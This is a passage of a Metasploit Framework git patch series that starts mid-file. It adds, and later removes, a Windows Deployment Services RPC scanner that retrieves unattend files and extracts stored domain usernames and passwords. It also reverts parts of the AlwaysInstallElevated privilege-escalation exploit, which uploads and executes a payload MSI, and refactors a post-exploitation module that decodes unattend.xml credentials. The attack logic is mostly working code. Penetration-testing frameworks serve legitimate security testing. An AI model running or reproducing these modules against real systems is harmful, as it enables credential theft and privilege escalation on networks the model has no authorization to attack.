VAR_NAME_MESSAGE_TYPE = "MESSAGE_TYPE" + VAR_NAME_TRANSACTION_ID = "TRANSACTION_ID" + VAR_NAME_FLAGS = "FLAGS" + VAR_NAME_CC = "CC" #Client Capabilities + VAR_NAME_IMDC = "IMDC" + + VAR_TYPE_LOOKUP = { + VAR_NAME_ARCHITECTURE => :ULONG, + VAR_NAME_CLIENT_GUID => :WSTRING, + VAR_NAME_CLIENT_MAC => :WSTRING, + VAR_NAME_VERSION => :ULONG, + VAR_NAME_MESSAGE_TYPE => :ULONG, + VAR_NAME_TRANSACTION_ID => :WSTRING, + VAR_NAME_FLAGS => :ULONG, + VAR_NAME_CC => :ULONG, + VAR_NAME_IMDC => :ULONG + } + + CC_FLAGS = { + :V2 => 1, + :VHDX => 2 + } + + DOMAIN_JOIN_FLAGS = { + :JOIN_DOMAIN => 1, + :ACCOUNT_EXISTS => 2, + :PRESTAGE_USING_MAC => 3, + :RESET_BOOT_PROGRAM => 256 + } + + ARCHITECTURE = { + :X64 => 9, + :X86 => 0, + :IA64 => 6, + :ARM => 5 + } + + PACKET_TYPE = { + :REQUEST => 1, + :REPLY => 2 + } + + OPCODE = { + :IMG_ENUMERATE => 2, + :LOG_INIT => 3, + :LOG_MSG => 4, + :GET_CLIENT_UNATTEND => 5, + :GET_UNATTEND_VARIABLES => 6, + :GET_DOMAIN_JOIN_INFORMATION => 7, + :RESET_BOOT_PROGRAM => 8, + :GET_MACHINE_DRIVER_PACKAGES => 200 + } + + BASE_TYPE = { + :BYTE => 0x0001, + :USHORT => 0x0002, + :ULONG => 0x0004, + :ULONG64 => 0x0008, + :STRING => 0x0010, + :WSTRING => 0x0020, + :BLOB => 0x0040 + } + + TYPE_MODIFIER = { + :NONE => 0x0000, + :ARRAY => 0x1000 + } + +end +end +end +end +end diff --git a/lib/rex/proto/dcerpc/wdscp/packet.rb b/lib/rex/proto/dcerpc/wdscp/packet.rb new file mode 100644 index 000000000000..972f0ed2a4ef --- /dev/null +++ b/lib/rex/proto/dcerpc/wdscp/packet.rb @@ -0,0 +1,74 @@ +# -*- coding: binary -*- +module Rex +module Proto +module DCERPC +module WDSCP +class Packet + + WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants + + def initialize(packet_type, opcode) + if opcode.nil? || packet_type.nil? + raise(ArgumentError, "Packet arguments cannot be nil") + end + + @variables = [] + @packet_type = WDS_CONST::PACKET_TYPE[packet_type] + @opcode = WDS_CONST::OPCODE[opcode] + end + + def add_var(name, type_mod=0, value_length=nil, array_size=0, value) + padding = 0 + value_type = WDS_CONST::BASE_TYPE[WDS_CONST::VAR_TYPE_LOOKUP[name]] + name = name.encode('UTF-16LE').unpack('H*')[0] + + value_length ||= value.length + + len = 16 * (1 + (value_length/16)) # Variable block total size should be evenly divisible by 16. + @variables << [name, padding, value_type, type_mod, value_length, array_size, value].pack('H132vvvVVa%i' % len) + end + + def create + packet = [] + var_count = @variables.count + + packet_size = 0 + @variables.each do |var| + packet_size += var.length + end + + packet_size += 16 # variables + operation + + # These bytes are not part of the spec but are not part of DCERPC according to Wireshark + # Perhaps something from MSRPC specific? Basically length of the WDSCP packet twice... + packet << [packet_size+40].pack('Q')*2 + packet << create_endpoint_header(packet_size) + packet << create_operation_header(packet_size, var_count, @packet_type, @opcode) + packet.concat(@variables) + + return packet.join + end + + def create_operation_header(packet_size, var_count, packet_type=:REQUEST, opcode) + return [ packet_size, # PacketSize + 256, # Version + packet_type, # Packet_Type + 0, # Padding + opcode, # Opcode + var_count, # Variable Count + ].pack('VvCCVV') + end + + def create_endpoint_header(packet_size) + return [ 40, # Header_Size + 256, # Version + packet_size, # Packet_Size - This doesn't differ from operation header despite the spec... + WDS_CONST::OS_DEPLOYMENT_GUID, # GUID + "\x00"*16, # Reserved + ].pack('vvVa16a16') + end +end +end +end +end +end diff --git a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb new file mode 100644 index 000000000000..f973f09e4c26 --- /dev/null +++ b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb @@ -0,0 +1,221 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex/proto/dcerpc' +require 'rex/proto/dcerpc/wdscp' +require 'rex/parser/unattend' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::DCERPC + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + DCERPCPacket = Rex::Proto::DCERPC::Packet + DCERPCClient = Rex::Proto::DCERPC::Client + DCERPCResponse = Rex::Proto::DCERPC::Response + DCERPCUUID = Rex::Proto::DCERPC::UUID + WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Deployment Services Unattend Retrieval', + 'Description' => %q{ + This module retrieves the client unattend file from Windows + Deployment Services RPC service and parses out the stored credentials. + Tested against Windows 2008 R2 + }, + 'Author' => [ 'Ben Campbell ' ], + 'License' => MSF_LICENSE, + 'Version' => '', + 'References' => + [ + [ 'MSDN', 'http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx'], + [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'] + ], + )) + + register_options( + [ + Opt::RPORT(5040), + ], self.class) + + deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') + + register_advanced_options( + [ + OptBool.new('ENUM_ARM', [true, 'Enumerate Unattend for ARM architectures (not currently supported by Windows and will cause an error in System Event Log)', false]) + ], self.class) + end + + def run_host(ip) + begin + query_host(ip) + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("#{ip}:#{rport} error: #{e}") + end + end + + def query_host(rhost) + # Create a handler with our UUID and Transfer Syntax + self.handle = Rex::Proto::DCERPC::Handle.new( + [ + WDS_CONST::WDSCP_RPC_UUID, + '1.0', + '71710533-beba-4937-8319-b5dbef9ccc36', + 1 + ], + 'ncacn_ip_tcp', + rhost, + [datastore['RPORT']] + ) + + print_status("Binding to #{handle} ...") + + self.dcerpc = Rex::Proto::DCERPC::Client.new(self.handle, self.sock) + print_good("Bound to #{handle}") + + report_service( + :host => rhost, + :port => datastore['RPORT'], + :proto => 'tcp', + :name => "dcerpc", + :info => "#{WDS_CONST::WDSCP_RPC_UUID} v1.0 Windows Deployment Services" + ) + + table = Rex::Ui::Text::Table.new({ + 'Header' => 'Windows Deployment Services', + 'Indent' => 1, + 'Columns' => ['Architecture', 'Type', 'Domain', 'Username', 'Password'] + }) + + creds_found = false + + WDS_CONST::ARCHITECTURE.each do |architecture| + if architecture[0] == :ARM && !datastore['ENUM_ARM'] + vprint_status "Skipping #{architecture[0]} architecture due to adv option" + next + end + + begin + result = request_client_unattend(architecture) + rescue ::Rex::Proto::DCERPC::Exceptions::Fault => e + vprint_error(e.to_s) + print_error("#{rhost} DCERPC Fault - Windows Deployment Services is present but not configured. Perhaps an SCCM installation.") + return + end + + unless result.nil? + loot_unattend(architecture[0], result) + results = parse_client_unattend(result) + + results.each do |result| + unless result.empty? + unless result['username'].nil? || result['password'].nil? + print_good("Retrived #{result['type']} credentials for #{architecture[0]}") + creds_found = true + domain = "" + domain = result['domain'] if result['domain'] + report_creds(domain, result['username'], result['password']) + table << [architecture[0], result['type'], domain, result['username'], result['password']] + end + end + end + end + end + + if creds_found + print_line + table.print + print_line + else + print_error("No Unattend files received, service is unlikely to be configured for completely unattended installation.") + end + end + + def request_client_unattend(architecture) + # Construct WDS Control Protocol Message + packet = Rex::Proto::DCERPC::WDSCP::Packet.new(:REQUEST, :GET_CLIENT_UNATTEND) + packet.add_var( WDS_CONST::VAR_NAME_ARCHITECTURE, [architecture[1]].pack('C')) + packet.add_var( WDS_CONST::VAR_NAME_CLIENT_GUID, + "\x35\x00\x36\x00\x34\x00\x44\x00\x41\x00\x36\x00\x31\x00\x44\x00"\ + "\x32\x00\x41\x00\x45\x00\x31\x00\x41\x00\x41\x00\x42\x00\x32\x00"\ + "\x38\x00\x36\x00\x34\x00\x46\x00\x34\x00\x34\x00\x46\x00\x32\x00"\ + "\x38\x00\x32\x00\x46\x00\x30\x00\x34\x00\x33\x00\x34\x00\x30\x00"\ + "\x00\x00") + packet.add_var( WDS_CONST::VAR_NAME_CLIENT_MAC, + "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"\ + "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"\ + "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x35\x00\x30\x00"\ + "\x35\x00\x36\x00\x33\x00\x35\x00\x31\x00\x41\x00\x37\x00\x35\x00"\ + "\x00\x00") + packet.add_var( WDS_CONST::VAR_NAME_VERSION,"\x00\x00\x00\x01\x00\x00\x00\x00") + wdsc_packet = packet.create + + print_status("Sending #{architecture[0]} Client Unattend request ...") + response = dcerpc.call(0, wdsc_packet) + + if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) + vprint_status('Received response ...') + data = dcerpc.last_response.stub_data + + # Check WDSC_Operation_Header OpCode-ErrorCode is success 0x000000 + op_error_code = data.unpack('i*')[18] + if op_error_code == 0 + if data.length < 277 + vprint_error("No Unattend received for #{architecture[0]} architecture") + return nil + else + vprint_status("Received #{architecture[0]} unattend file ...") + return extract_unattend(data) + end + else + vprint_error("Error code received for #{architecture[0]}: #{op_error_code}") + return nil + end + end + end + + def extract_unattend(data) + start = data.index('')+10 + return data[start..finish] + end + + def parse_client_unattend(data) + begin + xml = REXML::Document.new(data) + + rescue REXML::ParseException => e + print_error("Invalid XML format") + vprint_line(e.message) + end + + return Rex::Parser::Unattend.parse(xml).flatten + end + + def loot_unattend(archi, data) + return if data.empty? + p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, archi, "Windows Deployment Services") + print_status("Raw version of #{archi} saved as: #{p}") + end + + def report_creds(domain, user, pass) + report_auth_info( + :host => rhost, + :port => 4050, + :sname => 'dcerpc', + :proto => 'tcp', + :source_id => nil, + :source_type => "aux", + :user => "#{domain}\\#{user}", + :pass => pass) + end +end From 7a1ca528f25c6011d5241244e98bbd62bef9ac5d Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 13 Dec 2012 10:53:29 +0000 Subject: [PATCH 004/421] Revert always_install_elevated file to upstream --- .../windows/local/always_install_elevated.rb | 98 ------------------- 1 file changed, 98 deletions(-) diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb index 24fd83f47e6d..afad7c94657e 100644 --- a/modules/exploits/windows/local/always_install_elevated.rb +++ b/modules/exploits/windows/local/always_install_elevated.rb @@ -18,27 +18,12 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Registry -<<<<<<< HEAD -======= include Msf::Exploit::FileDropper ->>>>>>> upstream/master def initialize(info={}) super(update_info(info, { 'Name' => 'Windows AlwaysInstallElevated MSI', 'Description' => %q{ -<<<<<<< HEAD - This module checks the AlwaysInstallElevated registry keys which - dictate if .MSI files should be installed with elevated privileges - (NT AUTHORITY\SYSTEM). - - The default MSI file is data/exploits/exec_payload.msi with the WiX source - file under external/source/exploits/exec_payload_msi/exec_payload.wxs. - This MSI simply executes payload.exe within the same folder. - - The MSI may not execute succesfully successive times, but may be able to - get around this by regenerating the MSI. -======= This module checks the AlwaysInstallElevated registry keys which dictate if .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). @@ -48,7 +33,6 @@ def initialize(info={}) The MSI may not execute succesfully successive times, but may be able to get around this by regenerating the MSI. ->>>>>>> upstream/master MSI can be rebuilt from the source using the WIX tool with the following commands: candle exec_payload.wxs @@ -106,39 +90,6 @@ def check else print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") current_user_value = registry_getvaldata(hkcu,install_elevated) -<<<<<<< HEAD - - if current_user_value.nil? - print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") - return Msf::Exploit::CheckCode::Safe - elsif current_user_value == 0 - print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") - return Msf::Exploit::CheckCode::Safe - else - print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") - return Msf::Exploit::CheckCode::Vulnerable - end - end - end - - def cleanup - if @executed - begin - print_status("Deleting MSI...") - file_rm(@msi_destination) - rescue Rex::Post::Meterpreter::RequestError => e - print_error(e.to_s) - print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.") - end - - begin - print_status("Deleting Payload...") - file_rm(@payload_destination) - rescue Rex::Post::Meterpreter::RequestError => e - print_error(e.to_s) - print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.") - end -======= end if current_user_value.nil? @@ -150,58 +101,10 @@ def cleanup else print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Vulnerable ->>>>>>> upstream/master end end def exploit -<<<<<<< HEAD - @executed = false - if check == Msf::Exploit::CheckCode::Vulnerable - @executed = true - - msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi" - msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi") - - # Upload MSI - @msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped - print_status("Uploading the MSI to #{@msi_destination} ...") - - #upload_file - ::File.read doesn't appear to work in windows... - source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) } - write_file(@msi_destination, source) - - # Upload payload - payload = generate_payload_exe - @payload_destination = expand_path("%TEMP%\\payload.exe").strip - print_status("Uploading the Payload to #{@payload_destination} ...") - write_file(@payload_destination, payload) - - # Execute MSI - print_status("Executing MSI...") - - if datastore['LOG_FILE'].nil? - logging = "" - else - logging = "/l* #{datastore['LOG_FILE']} " - end - - if datastore['QUIET'] - quiet = "/quiet " - else - quiet = "" - end - - cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}" - vprint_status("Executing: #{cmd}") - begin - result = cmd_exec(cmd) - rescue Rex::TimeoutError - vprint_status("Execution timed out.") - end - vprint_status("MSI command-line feedback: #{result}") - end -======= if check != Msf::Exploit::CheckCode::Vulnerable return @@ -249,6 +152,5 @@ def exploit vprint_status("Execution timed out.") end vprint_status("MSI command-line feedback: #{result}") ->>>>>>> upstream/master end end From 6dd617422113dc0750b88b604896a8f0adefc421 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 13 Dec 2012 10:58:05 +0000 Subject: [PATCH 005/421] Migrate enum_unattend to unattend parser lib --- modules/post/windows/gather/enum_unattend.rb | 221 +++++-------------- 1 file changed, 60 insertions(+), 161 deletions(-) diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index 8fcf768d1627..baa33094ccdf 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb @@ -7,6 +7,7 @@ require 'msf/core' require 'msf/core/post/file' +require 'rex/parser/unattend' require 'rexml/document' class Metasploit3 < Msf::Post @@ -45,7 +46,7 @@ def initialize(info={}) # - # Determie if unattend.xml exists or not + # Determine if unattend.xml exists or not # def unattend_exists?(xml_path) x = session.fs.file.stat(xml_path) rescue nil @@ -75,152 +76,6 @@ def load_unattend(xml_path) return xml, raw end - - # - # Extract sensitive data from UserAccounts - # - def extract_useraccounts(user_accounts) - return[] if user_accounts.nil? - - cred_tables = [] - account_types = ['AdministratorPassword', 'DomainAccounts', 'LocalAccounts'] - account_types.each do |t| - element = user_accounts.elements[t] - next if element.nil? - - case t - # - # Extract the password from AdministratorPasswords - # - when account_types[0] - table = Rex::Ui::Text::Table.new({ - 'Header' => 'AdministratorPasswords', - 'Indent' => 1, - 'Columns' => ['Username', 'Password'] - }) - - password = element.elements['Value'].get_text.value rescue '' - plaintext = element.elements['PlainText'].get_text.value rescue 'true' - - if plaintext == 'false' - password = Rex::Text.decode_base64(password) - password = password.gsub(/#{Rex::Text.to_unicode('AdministratorPassword')}$/, '') - end - - if not password.empty? - table << ['Administrator', password] - cred_tables << table - end - - # - # Extract the sensitive data from DomainAccounts. - # According to MSDN, unattend.xml doesn't seem to store passwords for domain accounts - # - when account_types[1] #DomainAccounts - table = Rex::Ui::Text::Table.new({ - 'Header' => 'DomainAccounts', - 'Indent' => 1, - 'Columns' => ['Username', 'Group'] - }) - - element.elements.each do |account_list| - name = account_list.elements['DomainAccount/Name'].get_text.value rescue '' - group = account_list.elements['DomainAccount/Group'].get_text.value rescue 'true' - - table << [name, group] - end - - cred_tables << table if not table.rows.empty? - - # - # Extract the username/password from LocalAccounts - # - when account_types[2] #LocalAccounts - table = Rex::Ui::Text::Table.new({ - 'Header' => 'LocalAccounts', - 'Indent' => 1, - 'Columns' => ['Username', 'Password'] - }) - - element.elements.each do |local| - password = local.elements['Password/Value'].get_text.value rescue '' - plaintext = local.elements['Password/PlainText'].get_text.value rescue 'true' - - if plaintext == 'false' - password = Rex::Text.decode_base64(password) - password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') - end - - username = local.elements['Name'].get_text.value rescue '' - table << [username, password] - end - - cred_tables << table if not table.rows.empty? - end - end - - return cred_tables - end - - - # - # Extract sensitive data from AutoLogon - # - def extract_autologon(auto_logon) - return [] if auto_logon.nil? - - domain = auto_logon.elements['Domain'].get_text.value rescue '' - username = auto_logon.elements['Username'].get_text.value rescue '' - password = auto_logon.elements['Password/Value'].get_text.value rescue '' - plaintext = auto_logon.elements['Password/PlainText'].get_text.value rescue 'true' - - if plaintext == 'false' - password = Rex::Text.decode_base64(password) - password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') - end - - table = Rex::Ui::Text::Table.new({ - 'Header' => 'AutoLogon', - 'Indent' => 1, - 'Columns' => ['Domain', 'Username', 'Password'] - }) - - table << [domain, username, password] - - return [table] - end - - - # - # Extract sensitive data from Deployment Services. - # We can only seem to add one with Windows System Image Manager, so - # we'll only enum one. - # - def extract_deployment(deployment) - return [] if deployment.nil? - - domain = deployment.elements['Login/Credentials/Domain'].get_text.value rescue '' - username = deployment.elements['Login/Credentials/Username'].get_text.value rescue '' - password = deployment.elements['Login/Credentials/Password'].get_text.value rescue '' - plaintext = deployment.elements['Login/Credentials/Password/PlainText'].get_text.value rescue 'true' - - if plaintext == 'false' - password = Rex::Text.decode_base64(password) - password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') - end - - table = Rex::Ui::Text::Table.new({ - 'Header' => 'WindowsDeploymentServices', - 'Indent' => 1, - 'Columns' => ['Domain', 'Username', 'Password'] - }) - - table << [domain, username, password] - - return [table] - end - - # # Save Rex tables separately # @@ -309,20 +164,8 @@ def run # XML failed to parse, will not go on from here return if not xml - # Extract the credentials - tables = [] - unattend = xml.elements['unattend'] - return if unattend.nil? - - unattend.each_element do |settings| - next if settings.class != REXML::Element - settings.get_elements('component').each do |c| - next if c.class != REXML::Element - tables << extract_useraccounts(c.elements['UserAccounts']) - tables << extract_autologon(c.elements['AutoLogon']) - tables << extract_deployment(c.elements['WindowsDeploymentServices']) - end - end + results = Rex::Parser::Unattend.parse(xml) + tables = create_display_tables(results) # Save the data save_cred_tables(tables.flatten) if not tables.empty? @@ -330,4 +173,60 @@ def run return if not datastore['GETALL'] end end + + def create_display_tables(results) + tables = [] + wds_table = Rex::Ui::Text::Table.new({ + 'Header' => 'WindowsDeploymentServices', + 'Indent' => 1, + 'Columns' => ['Domain', 'Username', 'Password'] + }) + + autologin_table = Rex::Ui::Text::Table.new({ + 'Header' => 'AutoLogon', + 'Indent' => 1, + 'Columns' => ['Domain', 'Username', 'Password'] + }) + + admin_table = Rex::Ui::Text::Table.new({ + 'Header' => 'AdministratorPasswords', + 'Indent' => 1, + 'Columns' => ['Username', 'Password'] + }) + + domain_table = Rex::Ui::Text::Table.new({ + 'Header' => 'DomainAccounts', + 'Indent' => 1, + 'Columns' => ['Username', 'Group'] + }) + + local_table = Rex::Ui::Text::Table.new({ + 'Header' => 'LocalAccounts', + 'Indent' => 1, + 'Columns' => ['Username', 'Password'] + }) + results.each do |result| + unless result.empty? + case result['type'] + when 'wds' + wds_table << [result['domain'], result['username'], result['password']] + when 'auto' + autologin_table << [result['domain'], result['username'], result['password']] + when 'admin' + admin_table << [result['username'], result['password']] + when 'domain' + domain_table << [result['username'], result['group']] + when 'local' + local_table << [result['username'], result['password']] + end + end + end + + tables << autologin_table + tables << admin_table + tables << domain_table + tables << local_table + + return tables + end end From 3127808f76f20e8d8debca5233bb669d85cb89a2 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 13 Dec 2012 11:02:54 +0000 Subject: [PATCH 006/421] Revert/remove unnecessary files --- lib/rex/proto/dcerpc/client.rb | 9 +- lib/rex/proto/dcerpc/packet.rb | 10 +- lib/rex/proto/dcerpc/wdscp.rb | 3 - lib/rex/proto/dcerpc/wdscp/constants.rb | 89 ------- lib/rex/proto/dcerpc/wdscp/packet.rb | 74 ------ .../dcerpc/windows_deployment_services.rb | 221 ------------------ 6 files changed, 4 insertions(+), 402 deletions(-) delete mode 100644 lib/rex/proto/dcerpc/wdscp.rb delete mode 100644 lib/rex/proto/dcerpc/wdscp/constants.rb delete mode 100644 lib/rex/proto/dcerpc/wdscp/packet.rb delete mode 100644 modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb diff --git a/lib/rex/proto/dcerpc/client.rb b/lib/rex/proto/dcerpc/client.rb index c4aaaa6f3acb..928e5eb4bfc2 100644 --- a/lib/rex/proto/dcerpc/client.rb +++ b/lib/rex/proto/dcerpc/client.rb @@ -252,14 +252,7 @@ def bind() bind, context = Rex::Proto::DCERPC::Packet.make_bind_fake_multi(*args) else - if self.handle.uuid.length == 4 - bind, context = Rex::Proto::DCERPC::Packet.make_bind( self.handle.uuid[0], - self.handle.uuid[1], - self.handle.uuid[2], - self.handle.uuid[3]) - else - bind, context = Rex::Proto::DCERPC::Packet.make_bind(self.handle.uuid[0], self.handle.uuid[1]) - end + bind, context = Rex::Proto::DCERPC::Packet.make_bind(self.handle.uuid[0], self.handle.uuid[1]) end raise 'make_bind failed' if !bind diff --git a/lib/rex/proto/dcerpc/packet.rb b/lib/rex/proto/dcerpc/packet.rb index 34aa73de14c0..463a8a8be755 100644 --- a/lib/rex/proto/dcerpc/packet.rb +++ b/lib/rex/proto/dcerpc/packet.rb @@ -11,15 +11,11 @@ class Packet UUID = Rex::Proto::DCERPC::UUID # Create a standard DCERPC BIND request packet - def self.make_bind(uuid, vers, xfer_syntax_uuid=UUID.xfer_syntax_uuid, xfer_syntax_vers=UUID.xfer_syntax_vers) + def self.make_bind(uuid, vers) # Process the version strings ("1.0", 1.0, "1", 1) bind_vers_maj, bind_vers_min = UUID.vers_to_nums(vers) - xfer_vers_maj, xfer_vers_min = UUID.vers_to_nums(xfer_syntax_vers) - - if UUID.is? xfer_syntax_uuid - xfer_syntax_uuid = UUID.uuid_pack(xfer_syntax_uuid) - end + xfer_vers_maj, xfer_vers_min = UUID.vers_to_nums(UUID.xfer_syntax_vers) # Create the bind request packet buff = @@ -41,7 +37,7 @@ def self.make_bind(uuid, vers, xfer_syntax_uuid=UUID.xfer_syntax_uuid, xfer_synt UUID.uuid_pack(uuid), # interface uuid bind_vers_maj, # interface major version bind_vers_min, # interface minor version - xfer_syntax_uuid, # transfer syntax + UUID.xfer_syntax_uuid, # transfer syntax xfer_vers_maj, # syntax major version xfer_vers_min, # syntax minor version ].pack('CCCCNvvVvvVVvvA16vvA16vv') diff --git a/lib/rex/proto/dcerpc/wdscp.rb b/lib/rex/proto/dcerpc/wdscp.rb deleted file mode 100644 index 519f2ffb9071..000000000000 --- a/lib/rex/proto/dcerpc/wdscp.rb +++ /dev/null @@ -1,3 +0,0 @@ -# -*- coding: binary -*- -require 'rex/proto/dcerpc/wdscp/constants' -require 'rex/proto/dcerpc/wdscp/packet' diff --git a/lib/rex/proto/dcerpc/wdscp/constants.rb b/lib/rex/proto/dcerpc/wdscp/constants.rb deleted file mode 100644 index 1df1625a4ff2..000000000000 --- a/lib/rex/proto/dcerpc/wdscp/constants.rb +++ /dev/null @@ -1,89 +0,0 @@ -# -*- coding: binary -*- -module Rex -module Proto -module DCERPC -module WDSCP -# http://msdn.microsoft.com/en-us/library/dd891406(prot.20).aspx -# http://msdn.microsoft.com/en-us/library/dd541332(prot.20).aspx -# Not all values defined by the spec have been imported... -class Constants - WDSCP_RPC_UUID = "1A927394-352E-4553-AE3F-7CF4AAFCA620" - OS_DEPLOYMENT_GUID = "\x5a\xeb\xde\xd8\xfd\xef\xb2\x43\x99\xfc\x1a\x8a\x59\x21\xc2\x27" - - VAR_NAME_ARCHITECTURE = "ARCHITECTURE" - VAR_NAME_CLIENT_GUID = "CLIENT_GUID" - VAR_NAME_CLIENT_MAC = "CLIENT_MAC" - VAR_NAME_VERSION = "VERSION" - VAR_NAME_MESSAGE_TYPE = "MESSAGE_TYPE" - VAR_NAME_TRANSACTION_ID = "TRANSACTION_ID" - VAR_NAME_FLAGS = "FLAGS" - VAR_NAME_CC = "CC" #Client Capabilities - VAR_NAME_IMDC = "IMDC" - - VAR_TYPE_LOOKUP = { - VAR_NAME_ARCHITECTURE => :ULONG, - VAR_NAME_CLIENT_GUID => :WSTRING, - VAR_NAME_CLIENT_MAC => :WSTRING, - VAR_NAME_VERSION => :ULONG, - VAR_NAME_MESSAGE_TYPE => :ULONG, - VAR_NAME_TRANSACTION_ID => :WSTRING, - VAR_NAME_FLAGS => :ULONG, - VAR_NAME_CC => :ULONG, - VAR_NAME_IMDC => :ULONG - } - - CC_FLAGS = { - :V2 => 1, - :VHDX => 2 - } - - DOMAIN_JOIN_FLAGS = { - :JOIN_DOMAIN => 1, - :ACCOUNT_EXISTS => 2, - :PRESTAGE_USING_MAC => 3, - :RESET_BOOT_PROGRAM => 256 - } - - ARCHITECTURE = { - :X64 => 9, - :X86 => 0, - :IA64 => 6, - :ARM => 5 - } - - PACKET_TYPE = { - :REQUEST => 1, - :REPLY => 2 - } - - OPCODE = { - :IMG_ENUMERATE => 2, - :LOG_INIT => 3, - :LOG_MSG => 4, - :GET_CLIENT_UNATTEND => 5, - :GET_UNATTEND_VARIABLES => 6, - :GET_DOMAIN_JOIN_INFORMATION => 7, - :RESET_BOOT_PROGRAM => 8, - :GET_MACHINE_DRIVER_PACKAGES => 200 - } - - BASE_TYPE = { - :BYTE => 0x0001, - :USHORT => 0x0002, - :ULONG => 0x0004, - :ULONG64 => 0x0008, - :STRING => 0x0010, - :WSTRING => 0x0020, - :BLOB => 0x0040 - } - - TYPE_MODIFIER = { - :NONE => 0x0000, - :ARRAY => 0x1000 - } - -end -end -end -end -end diff --git a/lib/rex/proto/dcerpc/wdscp/packet.rb b/lib/rex/proto/dcerpc/wdscp/packet.rb deleted file mode 100644 index 972f0ed2a4ef..000000000000 --- a/lib/rex/proto/dcerpc/wdscp/packet.rb +++ /dev/null @@ -1,74 +0,0 @@ -# -*- coding: binary -*- -module Rex -module Proto -module DCERPC -module WDSCP -class Packet - - WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants - - def initialize(packet_type, opcode) - if opcode.nil? || packet_type.nil? - raise(ArgumentError, "Packet arguments cannot be nil") - end - - @variables = [] - @packet_type = WDS_CONST::PACKET_TYPE[packet_type] - @opcode = WDS_CONST::OPCODE[opcode] - end - - def add_var(name, type_mod=0, value_length=nil, array_size=0, value) - padding = 0 - value_type = WDS_CONST::BASE_TYPE[WDS_CONST::VAR_TYPE_LOOKUP[name]] - name = name.encode('UTF-16LE').unpack('H*')[0] - - value_length ||= value.length - - len = 16 * (1 + (value_length/16)) # Variable block total size should be evenly divisible by 16. - @variables << [name, padding, value_type, type_mod, value_length, array_size, value].pack('H132vvvVVa%i' % len) - end - - def create - packet = [] - var_count = @variables.count - - packet_size = 0 - @variables.each do |var| - packet_size += var.length - end - - packet_size += 16 # variables + operation - - # These bytes are not part of the spec but are not part of DCERPC according to Wireshark - # Perhaps something from MSRPC specific? Basically length of the WDSCP packet twice... - packet << [packet_size+40].pack('Q')*2 - packet << create_endpoint_header(packet_size) - packet << create_operation_header(packet_size, var_count, @packet_type, @opcode) - packet.concat(@variables) - - return packet.join - end - - def create_operation_header(packet_size, var_count, packet_type=:REQUEST, opcode) - return [ packet_size, # PacketSize - 256, # Version - packet_type, # Packet_Type - 0, # Padding - opcode, # Opcode - var_count, # Variable Count - ].pack('VvCCVV') - end - - def create_endpoint_header(packet_size) - return [ 40, # Header_Size - 256, # Version - packet_size, # Packet_Size - This doesn't differ from operation header despite the spec... - WDS_CONST::OS_DEPLOYMENT_GUID, # GUID - "\x00"*16, # Reserved - ].pack('vvVa16a16') - end -end -end -end -end -end diff --git a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb deleted file mode 100644 index f973f09e4c26..000000000000 --- a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb +++ /dev/null @@ -1,221 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'rex/proto/dcerpc' -require 'rex/proto/dcerpc/wdscp' -require 'rex/parser/unattend' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::DCERPC - include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner - - DCERPCPacket = 